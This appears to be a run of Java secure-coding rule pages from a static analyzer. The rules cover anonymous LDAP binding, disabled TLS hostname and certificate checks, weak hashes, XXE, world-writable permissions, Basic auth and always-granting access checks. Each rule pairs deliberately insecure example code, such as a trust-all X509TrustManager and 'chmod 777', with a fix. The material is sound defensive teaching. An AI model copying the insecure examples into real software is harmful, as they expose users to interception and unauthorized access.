
Sensitive information leak

If attackers get read-only access to the directory, they will be able to read the data it stores. That data might include security-sensitive pieces of information.

Typically, attackers might get access to user account lists that they can use in further intrusion steps. For example, they could use such lists to perform password spraying, or related attacks, on all systems that rely on the affected directory as an identity provider.

If the directory contains some Personally Identifiable Information, an attacker accessing it might represent a violation of regulatory requirements in some countries. For example, this kind of security event would go against the European GDPR law.

How to fix it

Code examples

The following code indicates an anonymous LDAP authentication vulnerability because it binds to a remote server using an Anonymous Simple authentication mechanism.

Noncompliant code example

// Set up the environment for creating the initial context
Hashtable<String, Object> env = new Hashtable<String, Object>();
env.put(Context.INITIAL_CONTEXT_FACTORY, "com.sun.jndi.ldap.LdapCtxFactory");
env.put(Context.PROVIDER_URL, "ldap://localhost:389/o=JNDITutorial");

// Use anonymous authentication
env.put(Context.SECURITY_AUTHENTICATION, "none"); // Noncompliant

// Create the initial context
DirContext ctx = new InitialDirContext(env);

Compliant solution

// Set up the environment for creating the initial context
Hashtable<String, Object> env = new Hashtable<String, Object>();
env.put(Context.INITIAL_CONTEXT_FACTORY, "com.sun.jndi.ldap.LdapCtxFactory");
env.put(Context.PROVIDER_URL, "ldap://localhost:389/o=Example");

// Use simple authentication
env.put(Context.SECURITY_AUTHENTICATION, "simple");
env.put(Context.SECURITY_PRINCIPAL, "cn=local, ou=Unit, o=Example");
env.put(Context.SECURITY_CREDENTIALS, getLDAPPassword());

// Create the initial context
DirContext ctx = new InitialDirContext(env);

Resources

Documentation

Standards

java:S5527

This vulnerability allows attackers to impersonate a trusted host.

Why is this an issue?

Transport Layer Security (TLS) provides secure communication between systems over the internet by encrypting the data sent between them. In this process, the role of hostname validation, combined with certificate validation, is to ensure that a system is indeed the one it claims to be, adding an extra layer of trust and security.

When hostname validation is disabled, the client skips this critical check. This creates an opportunity for attackers to pose as a trusted entity and intercept, manipulate, or steal the data being transmitted.

To do so, an attacker would obtain a valid certificate authenticating example.com, serve it using a different hostname, and the application code would still accept it.

What is the potential impact?

Establishing trust in a secure way is a non-trivial task. When you disable hostname validation, you are removing a key mechanism designed to build this trust in internet communication, opening your system up to a number of potential threats.

Identity spoofing

If a system does not validate hostnames, it cannot confirm the identity of the other party involved in the communication. An attacker can exploit this by creating a fake server and masquerading it as a legitimate one. For example, they might set up a server that looks like your bank’s server, tricking your system into thinking it is communicating with the bank. This scenario, called identity spoofing, allows the attacker to collect any data your system sends to them, potentially leading to significant data breaches.

How to fix it in Apache Commons Email

Code examples

The following code contains examples of disabled hostname validation.

The hostname validation gets disabled because setSSLCheckServerIdentity is omitted. To enable validation, set it to true.

Noncompliant code example

import org.apache.commons.mail.DefaultAuthenticator;
import org.apache.commons.mail.Email;
import org.apache.commons.mail.SimpleEmail;

public void sendMail(String message) {
    Email email = new SimpleEmail();

    email.setMsg(message);
    email.setSmtpPort(465);
    email.setAuthenticator(new DefaultAuthenticator(username, password));
    email.setSSLOnConnect(true); // Noncompliant

    email.send();
}

Compliant solution

import org.apache.commons.mail.DefaultAuthenticator;
import org.apache.commons.mail.Email;
import org.apache.commons.mail.SimpleEmail;

public void sendMail(String message) {
    Email email = new SimpleEmail();

    email.setMsg(message);
    email.setSmtpPort(465);
    email.setAuthenticator(new DefaultAuthenticator(username, password));
    email.setSSLCheckServerIdentity(true);
    email.setSSLOnConnect(true);

    email.send();
}

How does this work?

To fix the vulnerability of disabled hostname validation, it is strongly recommended to first re-enable the default validation and fix the root cause: the validity of the certificate.

Use valid certificates

If a hostname validation failure prevents connecting to the target server, keep in mind that one system’s code should not work around another system’s problems, as this creates unnecessary dependencies and can lead to reliability issues.

Therefore, the first solution is to change the remote host’s certificate to match its identity. If the remote host is not under your control, consider replicating its service to a server whose certificate you can change yourself.

In case the contacted host is located on a development machine, and if there is no other choice, try following this solution:

  • Create a self-signed certificate for that machine.
  • Add this self-signed certificate to the system’s trust store.
  • If the hostname is not localhost, add the hostname in the /etc/hosts file.

Here is a sample command to import a certificate to the Java trust store:

keytool -import -alias myserver -file myserver.crt -keystore cacerts

Resources

Standards

java:S4790

Cryptographic hash algorithms such as MD2, MD4, MD5, MD6, HAVAL-128, HMAC-MD5, DSA (which uses SHA-1), RIPEMD, RIPEMD-128, RIPEMD-160, HMACRIPEMD160 and SHA-1 are no longer considered secure, because it is possible to have collisions (little computational effort is enough to find two or more different inputs that produce the same hash).

Ask Yourself Whether

The hashed value is used in a security context like:

  • User-password storage.
  • Security token generation (used to confirm e-mail when registering on a website, reset password, etc …​).
  • To compute some message integrity.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Safer alternatives, such as SHA-256, SHA-512, SHA-3 are recommended, and for password hashing, it’s even better to use algorithms that do not compute too "quickly", like bcrypt, scrypt, argon2 or pbkdf2 because it slows down brute force attacks.

Sensitive Code Example

MessageDigest md1 = MessageDigest.getInstance("SHA");  // Sensitive:  SHA is not a standard name, for most security providers it's an alias of SHA-1
MessageDigest md2 = MessageDigest.getInstance("SHA1");  // Sensitive

Compliant Solution

MessageDigest md1 = MessageDigest.getInstance("SHA-512"); // Compliant

See

java:S4792

Configuring loggers is security-sensitive. It has led in the past to the following vulnerabilities:

Logs are useful before, during and after a security incident.

  • Attackers will most of the time start their nefarious work by probing the system for vulnerabilities. Monitoring this activity and stopping it is the first step to prevent an attack from ever happening.
  • In case of a successful attack, logs should contain enough information to understand what damage an attacker may have inflicted.

Logs are also a target for attackers because they might contain sensitive information. Configuring loggers has an impact on the type of information logged and how they are logged.

This rule flags for review code that initiates loggers configuration. The goal is to guide security code reviews.

Ask Yourself Whether

  • unauthorized users might have access to the logs, either because they are stored in an insecure location or because the application gives access to them.
  • the logs contain sensitive information on a production server. This can happen when the logger is in debug mode.
  • the log can grow without limit. This can happen when additional information is written into logs every time a user performs an action and the user can perform the action as many times as he/she wants.
  • the logs do not contain enough information to understand the damage an attacker might have inflicted. The loggers mode (info, warn, error) might filter out important information. They might not print contextual information like the precise time of events or the server hostname.
  • the logs are only stored locally instead of being backuped or replicated.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Check that your production deployment doesn’t have its loggers in "debug" mode as it might write sensitive information in logs.
  • Production logs should be stored in a secure location which is only accessible to system administrators.
  • Configure the loggers to display all warnings, info and error messages. Write relevant information such as the precise time of events and the hostname.
  • Choose log format which is easy to parse and process automatically. It is important to process logs rapidly in case of an attack so that the impact is known and limited.
  • Check that the permissions of the log files are correct. If you index the logs in some other service, make sure that the transfer and the service are secure too.
  • Add limits to the size of the logs and make sure that no user can fill the disk with logs. This can happen even when the user does not control the logged information. An attacker could just repeat a logged action many times.

Remember that configuring loggers properly doesn’t make them bullet-proof. Here is a list of recommendations explaining on how to use your logs:

  • Don’t log any sensitive information. This obviously includes passwords and credit card numbers but also any personal information such as user names, locations, etc…​ Usually any information which is protected by law is good candidate for removal.
  • Sanitize all user inputs before writing them in the logs. This includes checking its size, content, encoding, syntax, etc…​ As for any user input, validate using whitelists whenever possible. Enabling users to write what they want in your logs can have many impacts. It could for example use all your storage space or compromise your log indexing service.
  • Log enough information to monitor suspicious activities and evaluate the impact an attacker might have on your systems. Register events such as failed logins, successful logins, server side input validation failures, access denials and any important transaction.
  • Monitor the logs for any suspicious activity.

Sensitive Code Example

This rule supports the following libraries: Log4J, java.util.logging and Logback

// === Log4J 2 ===
import org.apache.logging.log4j.core.config.builder.api.ConfigurationBuilderFactory;
import org.apache.logging.log4j.Level;
import org.apache.logging.log4j.core.*;
import org.apache.logging.log4j.core.config.*;

// Sensitive: creating a new custom configuration
abstract class CustomConfigFactory extends ConfigurationFactory {
    // ...
}

class A {
    void foo(Configuration config, LoggerContext context, java.util.Map<String, Level> levelMap,
            Appender appender, java.io.InputStream stream, java.net.URI uri,
            java.io.File file, java.net.URL url, String source, ClassLoader loader, Level level, Filter filter)
            throws java.io.IOException {
        // Creating a new custom configuration
        ConfigurationBuilderFactory.newConfigurationBuilder();  // Sensitive

        // Setting loggers level can result in writing sensitive information in production
        Configurator.setAllLevels("com.example", Level.DEBUG);  // Sensitive
        Configurator.setLevel("com.example", Level.DEBUG);  // Sensitive
        Configurator.setLevel(levelMap);  // Sensitive
        Configurator.setRootLevel(Level.DEBUG);  // Sensitive

        config.addAppender(appender); // Sensitive: this modifies the configuration

        LoggerConfig loggerConfig = config.getRootLogger();
        loggerConfig.addAppender(appender, level, filter); // Sensitive
        loggerConfig.setLevel(level); // Sensitive

        context.setConfigLocation(uri); // Sensitive

        // Load the configuration from a stream or file
        new ConfigurationSource(stream);  // Sensitive
        new ConfigurationSource(stream, file);  // Sensitive
        new ConfigurationSource(stream, url);  // Sensitive
        ConfigurationSource.fromResource(source, loader);  // Sensitive
        ConfigurationSource.fromUri(uri);  // Sensitive
    }
}
// === java.util.logging ===
import java.util.logging.*;

class M {
    void foo(LogManager logManager, Logger logger, java.io.InputStream is, Handler handler)
            throws SecurityException, java.io.IOException {
        logManager.readConfiguration(is); // Sensitive

        logger.setLevel(Level.FINEST); // Sensitive
        logger.addHandler(handler); // Sensitive
    }
}
// === Logback ===
import ch.qos.logback.classic.util.ContextInitializer;
import ch.qos.logback.core.Appender;
import ch.qos.logback.classic.joran.JoranConfigurator;
import ch.qos.logback.classic.spi.ILoggingEvent;
import ch.qos.logback.classic.*;

class M {
    void foo(Logger logger, Appender<ILoggingEvent> fileAppender) {
        System.setProperty(ContextInitializer.CONFIG_FILE_PROPERTY, "config.xml"); // Sensitive
        JoranConfigurator configurator = new JoranConfigurator(); // Sensitive

        logger.addAppender(fileAppender); // Sensitive
        logger.setLevel(Level.DEBUG); // Sensitive
    }
}

Exceptions

Log4J 1.x is not covered as it has reached end of life.

See

java:S2755

This vulnerability allows the usage of external entities in XML.

Why is this an issue?

External Entity Processing allows for XML parsing with the involvement of external entities. However, when this functionality is enabled without proper precautions, it can lead to a vulnerability known as XML External Entity (XXE) attack.

What is the potential impact?

Exposing sensitive data

One significant danger of XXE vulnerabilities is the potential for sensitive data exposure. By crafting malicious XML payloads, attackers can reference external entities that contain sensitive information, such as system files, database credentials, or configuration files. When these entities are processed during XML parsing, the attacker can extract the contents and gain unauthorized access to sensitive data. This poses a severe threat to the confidentiality of critical information.

Exhausting system resources

Another consequence of XXE vulnerabilities is the potential for denial-of-service attacks. By exploiting the ability to include external entities, attackers can construct XML payloads that cause resource exhaustion. This can overwhelm the system’s memory, CPU, or other critical resources, leading to system unresponsiveness or crashes. A successful DoS attack can disrupt the availability of services and negatively impact the user experience.

Forging requests

XXE vulnerabilities can also enable Server-Side Request Forgery (SSRF) attacks. By leveraging the ability to include external entities, an attacker can make the vulnerable application send arbitrary requests to other internal or external systems. This can result in unintended actions, such as retrieving data from internal resources, scanning internal networks, or attacking other systems. SSRF attacks can lead to severe consequences, including unauthorized data access, system compromise, or even further exploitation within the network infrastructure.

How to fix it in Java SE

Code examples

The following code contains examples of XML parsers that have external entity processing enabled. As a result, the parsers are vulnerable to XXE attacks if an attacker can control the XML file that is processed.

Noncompliant code example

DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance(); // Noncompliant

Compliant solution

Protection from XXE can be done in several different ways. Choose one depending on how the affected parser object is used in your code.

1. The first way is to completely disable DOCTYPE declarations:

// Applicable to:
// - DocumentBuilderFactory
// - SAXParserFactory
// - SchemaFactory
factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);

// For XMLInputFactory:
factory.setProperty(XMLInputFactory.SUPPORT_DTD, false);

2. Disable external entity declarations completely:

// Applicable to:
// - DocumentBuilderFactory
// - SAXParserFactory
factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);

// For XMLInputFactory:
factory.setProperty(XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES, Boolean.FALSE);

3. Prohibit the use of all protocols by external entities:

// `setAttribute` variant, applicable to:
// - DocumentBuilderFactory
// - TransformerFactory
factory.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, "");
factory.setAttribute(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");

// `setProperty` variant, applicable to:
// - XMLInputFactory
// - SchemaFactory
factory.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, "");
factory.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");

// For SAXParserFactory, the prohibition is done on child objects:
SAXParser parser = factory.newSAXParser();
parser.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, "");
parser.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");

How does this work?

Disable external entities

The most effective approach to prevent XXE vulnerabilities is to disable external entity processing entirely, unless it is explicitly required for specific use cases. By default, XML parsers should be configured to reject the processing of external entities. This can be achieved by setting the appropriate properties or options in your XML parser library or framework.

If external entity processing is necessary for certain scenarios, adopt a whitelisting approach to restrict the entities that can be resolved during XML parsing. Create a list of trusted external entities and disallow all others. This approach ensures that only known and safe entities are processed.
You should rely on features provided by your XML parser to restrict the external entities.

Going the extra mile

Disable entity expansion

Specifically for DocumentBuilderFactory, it is possible to disable the entity expansion. Note, however, that this does not prevent the retrieval of external entities.

factory.setExpandEntityReferences(false);

Resources

Standards

java:S2612

In Unix file system permissions, the "others" category refers to all users except the owner of the file system resource and the members of the group assigned to this resource.

Granting permissions to this category can lead to unintended access to files or directories that could allow attackers to obtain sensitive information, disrupt services or elevate privileges.

Ask Yourself Whether

  • The application is designed to be run on a multi-user environment.
  • Corresponding files and directories may contain confidential information.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

The most restrictive possible permissions should be assigned to files and directories.

Sensitive Code Example

    public void setPermissions(String filePath) {
        Set<PosixFilePermission> perms = new HashSet<PosixFilePermission>();
        // user permission
        perms.add(PosixFilePermission.OWNER_READ);
        perms.add(PosixFilePermission.OWNER_WRITE);
        perms.add(PosixFilePermission.OWNER_EXECUTE);
        // group permissions
        perms.add(PosixFilePermission.GROUP_READ);
        perms.add(PosixFilePermission.GROUP_EXECUTE);
        // others permissions
        perms.add(PosixFilePermission.OTHERS_READ); // Sensitive
        perms.add(PosixFilePermission.OTHERS_WRITE); // Sensitive
        perms.add(PosixFilePermission.OTHERS_EXECUTE); // Sensitive

        Files.setPosixFilePermissions(Paths.get(filePath), perms);
    }
    public void setPermissionsUsingRuntimeExec(String filePath) {
        Runtime.getRuntime().exec("chmod 777 file.json"); // Sensitive
    }
    public void setOthersPermissionsHardCoded(String filePath ) {
        Files.setPosixFilePermissions(Paths.get(filePath), PosixFilePermissions.fromString("rwxrwxrwx")); // Sensitive
    }

Compliant Solution

On operating systems that implement POSIX standard. This will throw a UnsupportedOperationException on Windows.

    public void setPermissionsSafe(String filePath) throws IOException {
        Set<PosixFilePermission> perms = new HashSet<PosixFilePermission>();
        // user permission
        perms.add(PosixFilePermission.OWNER_READ);
        perms.add(PosixFilePermission.OWNER_WRITE);
        perms.add(PosixFilePermission.OWNER_EXECUTE);
        // group permissions
        perms.add(PosixFilePermission.GROUP_READ);
        perms.add(PosixFilePermission.GROUP_EXECUTE);
        // others permissions removed
        perms.remove(PosixFilePermission.OTHERS_READ); // Compliant
        perms.remove(PosixFilePermission.OTHERS_WRITE); // Compliant
        perms.remove(PosixFilePermission.OTHERS_EXECUTE); // Compliant

        Files.setPosixFilePermissions(Paths.get(filePath), perms);
    }

See

java:S3752

An HTTP method is safe when used to perform a read-only operation, such as retrieving information. In contrast, an unsafe HTTP method is used to change the state of an application, for instance to update a user’s profile on a web application.

Common safe HTTP methods are GET, HEAD, or OPTIONS.

Common unsafe HTTP methods are POST, PUT and DELETE.

Allowing both safe and unsafe HTTP methods to perform a specific operation on a web application could impact its security, for example CSRF protections are most of the time only protecting operations performed by unsafe HTTP methods.

Ask Yourself Whether

  • HTTP methods are not defined at all for a route/controller of the application.
  • Safe HTTP methods are defined and used for a route/controller that can change the state of an application.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

For all the routes/controllers of an application, the authorized HTTP methods should be explicitly defined and safe HTTP methods should only be used to perform read-only operations.

Sensitive Code Example

@RequestMapping("/delete_user")  // Sensitive: by default all HTTP methods are allowed
public String delete1(String username) {
// state of the application will be changed here
}

@RequestMapping(path = "/delete_user", method = {RequestMethod.GET, RequestMethod.POST}) // Sensitive: both safe and unsafe methods are allowed
String delete2(@RequestParam("id") String id) {
// state of the application will be changed here
}

Compliant Solution

@RequestMapping("/delete_user", method = RequestMethod.POST)  // Compliant
public String delete1(String username) {
// state of the application will be changed here
}

@RequestMapping(path = "/delete_user", method = RequestMethod.POST) // Compliant
String delete2(@RequestParam("id") String id) {
// state of the application will be changed here
}

See

java:S4601

Why is this an issue?

URL patterns configured on a HttpSecurity.authorizeRequests() method are considered in the order they were declared. It’s easy to make a mistake and declare a less restrictive configuration before a more restrictive one. Therefore, it’s required to review the order of the "antMatchers" declarations. The /** one should be the last one if it is declared.

This rule raises an issue when:

  • A pattern is preceded by another that ends with ** and has the same beginning. E.g.: /page*-admin/db/** is after /page*-admin/**
  • A pattern without wildcard characters is preceded by another that matches. E.g.: /page-index/db is after /page*/**

Noncompliant code example

  protected void configure(HttpSecurity http) throws Exception {
    http.authorizeRequests()
      .antMatchers("/resources/**", "/signup", "/about").permitAll() // Compliant
      .antMatchers("/admin/**").hasRole("ADMIN")
      .antMatchers("/admin/login").permitAll() // Noncompliant; the pattern "/admin/login" should appear before "/admin/**"
      .antMatchers("/**", "/home").permitAll()
      .antMatchers("/db/**").access("hasRole('ADMIN') and hasRole('DBA')") // Noncompliant; the pattern "/db/**" should occurs before "/**"
      .and().formLogin().loginPage("/login").permitAll().and().logout().permitAll();
  }

Compliant solution

  protected void configure(HttpSecurity http) throws Exception {
    http.authorizeRequests()
      .antMatchers("/resources/**", "/signup", "/about").permitAll() // Compliant
      .antMatchers("/admin/login").permitAll()
      .antMatchers("/admin/**").hasRole("ADMIN") // Compliant
      .antMatchers("/db/**").access("hasRole('ADMIN') and hasRole('DBA')")
      .antMatchers("/**", "/home").permitAll() // Compliant; "/**" is the last one
      .and().formLogin().loginPage("/login").permitAll().and().logout().permitAll();
  }

Resources

java:S1313

Hardcoding IP addresses is security-sensitive. It has led in the past to the following vulnerabilities:

Today’s services have an ever-changing architecture due to their scaling and redundancy needs. It is a mistake to think that a service will always have the same IP address. When it does change, the hardcoded IP will have to be modified too. This will have an impact on the product development, delivery, and deployment:

  • The developers will have to do a rapid fix every time this happens, instead of having an operation team change a configuration file.
  • It misleads to use the same address in every environment (dev, sys, qa, prod).

Last but not least it has an effect on application security. Attackers might be able to decompile the code and thereby discover a potentially sensitive address. They can perform a Denial of Service attack on the service, try to get access to the system, or try to spoof the IP address to bypass security checks. Such attacks can always be possible, but in the case of a hardcoded IP address solving the issue will take more time, which will increase an attack’s impact.

Ask Yourself Whether

The disclosed IP address is sensitive, e.g.:

  • Can give information to an attacker about the network topology.
  • It’s a personal (assigned to an identifiable person) IP address.

There is a risk if you answered yes to any of these questions.

Recommended Secure Coding Practices

Don’t hard-code the IP address in the source code, instead make it configurable with environment variables, configuration files, or a similar approach. Alternatively, if confidentially is not required a domain name can be used since it allows to change the destination quickly without having to rebuild the software.

Sensitive Code Example

String ip = "192.168.12.42"; // Sensitive
Socket socket = new Socket(ip, 6667);

Compliant Solution

String ip = System.getenv("IP_ADDRESS"); // Compliant
Socket socket = new Socket(ip, 6667);

Exceptions

No issue is reported for the following cases because they are not considered sensitive:

  • Loopback addresses 127.0.0.0/8 in CIDR notation (from 127.0.0.0 to 127.255.255.255)
  • Broadcast address 255.255.255.255
  • Non-routable address 0.0.0.0
  • Strings of the form 2.5.<number>.<number> as they often match Object Identifiers (OID)
  • Addresses in the ranges 192.0.2.0/24, 198.51.100.0/24, 203.0.113.0/24, reserved for documentation purposes by RFC 5737
  • Addresses in the range 2001:db8::/32, reserved for documentation purposes by RFC 3849

See

java:S2647

Why is this an issue?

Basic authentication’s only means of obfuscation is Base64 encoding. Since Base64 encoding is easily recognized and reversed, it offers only the thinnest veil of protection to your users, and should not be used.

Noncompliant code example

// Using HttpPost from Apache HttpClient
String encoding = Base64Encoder.encode ("login:passwd");
org.apache.http.client.methods.HttpPost httppost = new HttpPost(url);
httppost.setHeader("Authorization", "Basic " + encoding);  // Noncompliant

or

// Using HttpURLConnection
String encoding = Base64.getEncoder().encodeToString(("login:passwd").getBytes(‌"UTF‌​-8"​));
HttpURLConnection conn = (HttpURLConnection) url.openConnection();
conn.setRequestMethod("POST");
conn.setDoOutput(true);
conn.setRequestProperty("Authorization", "Basic " + encoding); // Noncompliant

Resources

java:S4830

This vulnerability makes it possible that an encrypted communication is intercepted.

Why is this an issue?

Transport Layer Security (TLS) provides secure communication between systems over the internet by encrypting the data sent between them. The role of certificate validation in this process is to ensure that a system is indeed the one it claims to be, adding an extra layer of trust and security.

When certificate validation is disabled, the client skips this critical check. This creates an opportunity for attackers to pose as a trusted entity and intercept, manipulate, or steal the data being transmitted.

What is the potential impact?

Establishing trust in a secure way is a non-trivial task. When you disable certificate validation, you are removing a key mechanism designed to build this trust in internet communication, opening your system up to a number of potential threats.

Identity spoofing

If a system does not validate certificates, it cannot confirm the identity of the other party involved in the communication. An attacker can exploit this by creating a fake server and masquerading it as a legitimate one. For example, they might set up a server that looks like your bank’s server, tricking your system into thinking it is communicating with the bank. This scenario, called identity spoofing, allows the attacker to collect any data your system sends to them, potentially leading to significant data breaches.

Loss of data integrity

When TLS certificate validation is disabled, the integrity of the data you send and receive cannot be guaranteed. An attacker could modify the data in transit, and you would have no way of knowing. This could range from subtle manipulations of the data you receive to the injection of malicious code or malware into your system. The consequences of such breaches of data integrity can be severe, depending on the nature of the data and the system.

How to fix it in Java Cryptographic Extension

Code examples

The following code contains examples of disabled certificate validation.

The certificate validation gets disabled by overriding X509TrustManager with an empty implementation. It is highly recommended to use the original implementation.

Noncompliant code example

class TrustAllManager implements X509TrustManager {

    @Override
    public void checkClientTrusted(X509Certificate[] chain, String authType) throws CertificateException {  // Noncompliant
    }

    @Override
    public void checkServerTrusted(X509Certificate[] chain, String authType) throws CertificateException { // Noncompliant
    }

    @Override
    public X509Certificate[] getAcceptedIssuers() {
        return null;
    }
}

How does this work?

Addressing the vulnerability of disabled TLS certificate validation primarily involves re-enabling the default validation.

To avoid running into problems with invalid certificates, consider the following sections.

Using trusted certificates

If possible, always use a certificate issued by a well-known, trusted CA for your server. Most programming environments come with a predefined list of trusted root CAs, and certificates issued by these authorities are validated automatically. This is the best practice, and it requires no additional code or configuration.

Working with self-signed certificates or non-standard CAs

In some cases, you might need to work with a server using a self-signed certificate, or a certificate issued by a CA not included in your trusted roots. Rather than disabling certificate validation in your code, you can add the necessary certificates to your trust store.

Here is a sample command to import a certificate to the Java trust store:

keytool -import -alias myserver -file myserver.crt -keystore cacerts

Resources

Standards

java:S5808

Why is this an issue?

Authorizations granted or not to users to access resources of an application should be based on strong decisions. For instance, checking whether the user is authenticated or not, has the right roles/privileges. It may also depend on the user’s location, or the date, time when the user requests access.

Noncompliant code example

In a Spring-security web application:

  • the vote method of an AccessDecisionVoter type is not compliant when it returns only an affirmative decision (ACCESS_GRANTED) or abstains to make a decision (ACCESS_ABSTAIN):
public class WeakNightVoter implements AccessDecisionVoter {
    @Override
    public int vote(Authentication authentication, Object object, Collection collection) {  // Noncompliant

      Calendar calendar = Calendar.getInstance();

      int currentHour = calendar.get(Calendar.HOUR_OF_DAY);

      if(currentHour >= 8 && currentHour <= 19) {
        return ACCESS_GRANTED; // Noncompliant
      }

      // when users connect during the night, do not make decision
      return ACCESS_ABSTAIN; // Noncompliant
    }
}
  • the hasPermission method of a PermissionEvaluator type is not compliant when it doesn’t return false:
public class MyPermissionEvaluator implements PermissionEvaluator {
    @Override
    public boolean hasPermission(Authentication authentication, Object targetDomainObject, Object permission) {
        //Getting subject
        Object user = authentication.getPrincipal();

        if(user.getRole().equals(permission)) {
              return true; // Noncompliant
        }

        return true;  // Noncompliant
    }
}

Compliant solution

In a Spring-security web application:

  • the vote method of an AccessDecisionVoter type should return a negative decision (ACCESS_DENIED):
public class StrongNightVoter implements AccessDecisionVoter {
    @Override
    public int vote(Authentication authentication, Object object, Collection collection) {

      Calendar calendar = Calendar.getInstance();

      int currentHour = calendar.get(Calendar.HOUR_OF_DAY);

      if(currentHour >= 8 && currentHour <= 19) {
        return ACCESS_GRANTED;
      }

      // users are not allowed to connect during the night
      return ACCESS_DENIED; // Compliant
    }
}
public class MyPermissionEvaluator implements PermissionEvaluator {
    @Override
    public boolean hasPermission(Authentication authentication, Object targetDomainObject, Object permission) {
        //Getting subject
        Object user = authentication.getPrincipal();

        if(user.getRole().equals(permission)) {
              return true;
        }

        return false; // Compliant
    }
}

Exceptions

No issue is reported when the method throws an exception as it might be used to indicate a strong decision.

Resources

java:S2658

This rule is deprecated; use S6173 instead.

Why is this an issue?

Dynamically loaded classes could contain malicious code executed by a static class initializer. I.E. you wouldn’t even have to instantiate or explicitly invoke methods on such classes to be vulnerable to an attack.

This rule raises an issue for each use of dynamic class loading.

Noncompliant code example

String className = System.getProperty("messageClassName");
Class clazz = Class.forName(className);  // Noncompliant

Resources

java:S5804

User enumeration refers to the ability to guess existing usernames in a web application database. This can happen, for example, when using "sign-in/sign-on/forgot password" functionalities of a website.

When an user tries to "sign-in" to a website with an incorrect username/login, the web application should not disclose that the username doesn’t exist with a message similar to "this username is incorrect", instead a generic message should be used like "bad credentials", this way it’s not possible to guess whether the username or password was incorrect during the authentication.

If a user-management feature discloses information about the existence of a username, attackers can use brute force attacks to retrieve a large amount of valid usernames that will impact the privacy of corresponding users and facilitate other attacks (phishing, password guessing etc …​).

Ask Yourself Whether

  • The application discloses that a username exists in its database: most of the time it’s possible to avoid this kind of leak except for the "registration/sign-on" part of a website because in this case the user must choose a valid username (not already taken by another user).
  • There is no rate limiting and CAPTCHA protection in place for requests involving a username.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

When a user performs a request involving a username, it should not be possible to spot differences between a valid and incorrect username:

  • Error messages should be generic and not disclose if the username is valid or not.
  • The response time must be similar for a valid username or not.
  • CAPTCHA and other rate limiting solutions should be implemented.

Sensitive Code Example

In a Spring-security web application the username leaks when:

  • The string used as argument of loadUserByUsername method is used in an exception message:
public String authenticate(String username, String password) {
  // ....
  MyUserDetailsService s1 = new MyUserDetailsService();
  MyUserPrincipal u1 = s1.loadUserByUsername(username);

  if(u1 == null) {
    throw new BadCredentialsException(username+" doesn't exist in our database"); // Sensitive
  }
  // ....
}
public String authenticate(String username, String password) {
  // ....
  if(user == null) {
      throw new UsernameNotFoundException("user not found"); // Sensitive
  }
  // ....
}
DaoAuthenticationProvider daoauth = new DaoAuthenticationProvider();
daoauth.setUserDetailsService(new MyUserDetailsService());
daoauth.setPasswordEncoder(new BCryptPasswordEncoder());
daoauth.setHideUserNotFoundExceptions(false); // Sensitive
builder.authenticationProvider(daoauth);

Compliant Solution

In a Spring-security web application:

  • the same message should be used regardless of whether it is the wrong user or password:
public String authenticate(String username, String password) throws AuthenticationException {
  Details user = null;
  try {
    user = loadUserByUsername(username);
  } catch (UsernameNotFoundException | DataAccessException e) {
    // Hide this exception reason to not disclose that the username doesn't exist
  }
  if (user == null || !user.isPasswordCorrect(password)) {
     // User should not be able to guess if the bad credentials message is related to the username or the password
    throw new BadCredentialsException("Bad credentials");
  }
}
DaoAuthenticationProvider daoauth = new DaoAuthenticationProvider();
daoauth.setUserDetailsService(new MyUserDetailsService());
daoauth.setPasswordEncoder(new BCryptPasswordEncoder());
daoauth.setHideUserNotFoundExceptions(true); // Compliant
builder.authenticationProvider(daoauth);

See

java:S6263

In AWS, long-term access keys will be valid until you manually revoke them. This makes them highly sensitive as any exposure can have serious consequences and should be used with care.

This rule will trigger when encountering an instantiation of com.amazonaws.auth.BasicAWSCredentials.

Ask Yourself Whether

  • The access key is used directly in an application or AWS CLI script running on an Amazon EC2 instance.
  • Cross-account access is needed.
  • The access keys need to be embedded within a mobile application.
  • Existing identity providers (SAML 2.0, on-premises identity store) already exists.

For more information, see Use IAM roles instead of long-term access keys.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Consider using IAM roles or other features of the AWS Security Token Service that provide temporary credentials, limiting the risks.

Sensitive Code Example

import com.amazonaws.auth.AWSCredentials;
import com.amazonaws.auth.BasicAWSCredentials;
// ...

AWSCredentials awsCredentials = new BasicAWSCredentials(accessKeyId, secretAccessKey);

Compliant Solution

Example for AWS STS (see Getting Temporary Credentials with AWS STS).

BasicSessionCredentials sessionCredentials = new BasicSessionCredentials(
   session_creds.getAccessKeyId(),
   session_creds.getSecretAccessKey(),
   session_creds.getSessionToken());

See

java:S6363

WebViews can be used to display web content as part of a mobile application. A browser engine is used to render and display the content. Like a web application, a mobile application that uses WebViews can be vulnerable to Cross-Site Scripting if untrusted code is rendered.

If malicious JavaScript code in a WebView is executed this can leak the contents of sensitive files when access to local files is enabled.

Ask Yourself Whether

  • No local files have to be accessed by the Webview.
  • The WebView contains untrusted data that could cause harm when rendered.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It is recommended to disable access to local files for WebViews unless it is necessary. In the case of a successful attack through a Cross-Site Scripting vulnerability the attackers attack surface decreases drastically if no files can be read out.

Sensitive Code Example

import android.webkit.WebView;

WebView webView = (WebView) findViewById(R.id.webview);
webView.getSettings().setAllowFileAccess(true); // Sensitive
webView.getSettings().setAllowContentAccess(true); // Sensitive

Compliant Solution

import android.webkit.WebView;

WebView webView = (WebView) findViewById(R.id.webview);
webView.getSettings().setAllowFileAccess(false);
webView.getSettings().setAllowContentAccess(false);

See

java:S6362

